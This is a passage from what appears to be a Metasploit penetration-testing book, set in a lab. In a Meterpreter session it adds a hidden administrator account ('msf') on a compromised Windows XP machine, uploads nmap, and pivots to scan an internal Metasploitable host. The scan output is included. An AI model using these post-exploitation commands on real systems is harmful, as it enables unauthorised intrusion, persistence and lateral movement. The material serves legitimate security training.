background image

258

Chapter 17

Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

net user msf metasploit /add

net user msf metasploit /ADD
The command completed successfully.
C:\WINDOWS\system32>

net localgroup administrators msf /add

net localgroup administrators msf /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>

^Z

Background channel 6? [y/N]  y
meterpreter > 

upload nmap.exe

[*] uploading  : nmap.exe -> nmap.exe
[*] uploaded   : nmap.exe -> nmap.exe
meterpreter >

We now have our launching pad for additional attacks. With 

nmap

 installed 

on the target, we are essentially sitting on the internal network. We can now 
attempt to enumerate internally connected systems and further penetrate 
the network.

Scanning the Metasploitable System

With our Meterpreter session granting us access to the internal network via 
the 

load auto_add_route

 command, we can scan and exploit the inside hosts 

using the compromised Windows XP target as the launching point. We’re 
effectively connected to the internal network, so we should be able to reach 
our Metasploitable system. Let’s begin with a basic port scan.

nmap.exe -sT -A -P0 172.16.32.162

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB